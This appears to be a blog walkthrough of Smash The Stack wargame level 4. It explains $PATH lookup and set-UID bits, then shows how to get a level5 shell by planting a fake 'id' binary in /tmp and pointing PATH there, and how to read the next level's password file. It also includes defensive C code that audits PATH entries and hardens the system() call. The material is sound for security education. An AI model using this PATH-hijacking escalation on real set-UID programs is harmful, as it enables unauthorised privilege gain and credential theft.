Smash The Stack – Level 4

LEVEL 4
Today I learned how the “which” command works.

Let's see what the which command does:

PROGRAM: which.sh

#! /bin/sh
set -ef

# Pick an output function that prints its arguments verbatim, on ksh and
# on other shells.
if test -n "$KSH_VERSION"; then
    puts() {
        print -r -- "$*"
    }
else
    puts() {
        printf '%s\n' "$*"
    }
fi

ALLMATCHES=0

# -a: report every match in $PATH instead of stopping at the first one.
while getopts a whichopts
do
    case "$whichopts" in
        a) ALLMATCHES=1 ;;
        ?) puts "Usage: $0 [-a] args"; exit 2 ;;
    esac
done
shift $(($OPTIND - 1))

if [ "$#" -eq 0 ]; then
    ALLRET=1
else
    ALLRET=0
fi
# A trailing colon is an empty entry; double it so the field splitting
# below does not drop it.
case $PATH in
    (*[!:]:) PATH="$PATH:" ;;
esac
for PROGRAM in "$@"; do
    RET=1
    IFS_SAVE="$IFS"
    IFS=:
    case $PROGRAM in
        */*)
            # A name containing a slash is used as given; $PATH is not searched.
            if [ -f "$PROGRAM" ] && [ -x "$PROGRAM" ]; then
                puts "$PROGRAM"
                RET=0
            fi
            ;;
        *)
            # Otherwise try each $PATH entry in order; an empty entry means ".".
            for ELEMENT in $PATH; do
                if [ -z "$ELEMENT" ]; then
                    ELEMENT=.
                fi
                if [ -f "$ELEMENT/$PROGRAM" ] && [ -x "$ELEMENT/$PROGRAM" ]; then
                    puts "$ELEMENT/$PROGRAM"
                    RET=0
                    [ "$ALLMATCHES" -eq 1 ] || break
                fi
            done
            ;;
    esac
    IFS="$IFS_SAVE"
    if [ "$RET" -ne 0 ]; then
        ALLRET=1
    fi
done

exit "$ALLRET"

This script searches $PATH, which is a Unix environment variable.
$PATH contains a colon-separated list of directories that the
shell searches for commands whose name does not contain a slash.
Note that an empty entry (a leading, trailing or doubled colon)
is treated as the current directory. Keep PATH in mind.

So this is our question:


#include <stdlib.h>
int main()
{
system("id");
return 0;
}

When you execute this program, it prints the id: the real and the
effective user and group IDs.


$./level04
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1005(level5),1004(level4),1029(nosu)

As you can see, system() is similar to running a command in a terminal.
system() executes the command specified in string by calling
/bin/sh -c string, and returns after the command has
completed. During execution of the command, SIGCHLD is
blocked, and SIGINT and SIGQUIT are ignored.
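Because /bin/sh resolves a bare command name through the caller's $PATH, a set-UID program that calls system("id") lets the caller choose which "id" runs. The following is an added example, not code from the level or from this post: it checks $PATH entries the same way which.sh walks them (empty entry = ".") and shows a replacement for system("id") that uses an absolute path and a fixed environment; the trusted list /usr/bin:/bin and the requirement that entries be root-owned are assumptions.

```c
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* 1 if dir is an absolute directory owned by root and not group/other writable.
 * Empty ("" is "." in which.sh), relative and missing entries are untrusted. */
int path_entry_is_trusted(const char *dir)
{
    struct stat st;
    if (dir[0] != '/' || stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    return st.st_uid == 0 && !(st.st_mode & (S_IWGRP | S_IWOTH));
}

/* Walk a colon-separated PATH exactly as which.sh does (a trailing colon is an
 * empty entry) and count the entries a set-UID program must not search. */
int count_untrusted_path_entries(const char *path)
{
    int untrusted = 0;
    for (;;) {
        const char *colon = strchr(path, ':');
        size_t len = colon ? (size_t)(colon - path) : strlen(path);
        char entry[4096];
        if (len >= sizeof entry) len = sizeof entry - 1;
        memcpy(entry, path, len);
        entry[len] = '\0';
        untrusted += !path_entry_is_trusted(entry);
        if (!colon) return untrusted;
        path = colon + 1;
    }
}

/* Hardened replacement for system("id"): absolute program path plus a fixed
 * environment, so the caller's $PATH is never consulted; returns id's status. */
int run_id_hardened(void)
{
    char *const argv[] = { "id", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };   /* assumed trusted list */
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/usr/bin/id", argv, envp);
        execve("/bin/id", argv, envp); /* older layouts keep id in /bin */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With PATH=/tmp/sys, count_untrusted_path_entries() reports one untrusted entry, which is exactly the condition the level exploits; run_id_hardened() produces the same id output whatever PATH the caller supplied.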

If you look at the permissions of the executable file,
you will find an ‘s’ in place of the ‘x’ in the owner's
permission bits.


$ls -l /levels/level04
-r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04

An executable program with the set-UID or set-group-ID bit
runs with the effective permissions of its owner or group.

For a directory, the set-groupID flag means that all files created
inside that directory will inherit the group of the directory.
Without this flag, a file takes on the primary group of the user
creating the file. This property is important to people trying to
maintain a directory as group accessible. The subdirectories also
inherit the set-groupID property.

So if we get a shell from this executable, that shell will
run as level5.

We cannot solve this with a buffer overflow, since there is no
function in the program that spawns a shell. So we have to
do something else.

In STS, as you may have noticed, we can only create files or folders
inside /tmp.


level4@io:~$ ls -l /
total 152
drwxr-xr-x 2 root root 4096 Aug 1 22:47 bin
drwx------ 2 root root 4096 Oct 28 2006 boot
drwxr-xr-x 5 root root 4096 Aug 2 17:01 dev
drwx--x--x 73 root root 4096 Aug 13 16:21 etc
drwx--x--x 38 root root 4096 Aug 13 08:15 home
drwx------ 2 root root 4096 Apr 24 2007 initrd
drwxr-xr-x 3 root root 4096 Aug 13 08:20 levels
drwxr-xr-x 10 root root 12288 Aug 1 23:04 lib
drwx------ 2 root root 4096 Apr 24 2007 media
drwx------ 2 root root 4096 Oct 28 2006 mnt
drwxr-xr-x 2 root root 4096 Apr 24 2007 opt
dr-xr-x--x 92 root root 0 Aug 2 17:00 proc
-rw-r--r-- 1 root root 0 Aug 2 17:00 reboot
drwx------ 15 root root 4096 Oct 27 19:58 root
drwxr-xr-x 2 root root 4096 Aug 1 23:01 sbin
drwxr-xr-x 2 root root 4096 Sep 16 2008 selinux
drwx------ 2 root root 4096 Apr 24 2007 srv
drwxr-xr-x 3 root root 0 Aug 2 17:00 sys
drwx-wx-wt 186 root root 73728 Oct 29 14:14 tmp
drwxr-xr-x 11 root root 4096 Aug 1 22:54 usr
drwxr-xr-x 15 root root 4096 Mar 2 2011 var

Make a folder named sys inside /tmp and create a file
id.c in it.

Note: you can name the folder whatever you wish.


$mkdir /tmp/sys && cd /tmp/sys/ && vim id.c

Now create a simple program that contains a system() call
which runs a shell (/bin/sh). Give the program any name
(I used bla.c), but when compiling, name the output file
‘id’.


$gcc bla.c -o id

Do you remember the PATH variable I mentioned at the
beginning of this level? Make use of it and set PATH to
/tmp/sys.


$PATH=/tmp/sys

Then execute the level04 executable. You will get a SHELL;
restore the default PATH immediately after getting the
shell. Then check the ‘id’ of the new shell: you will find
it is level5.

Please find the password for the next level from
/home/level5/.pass
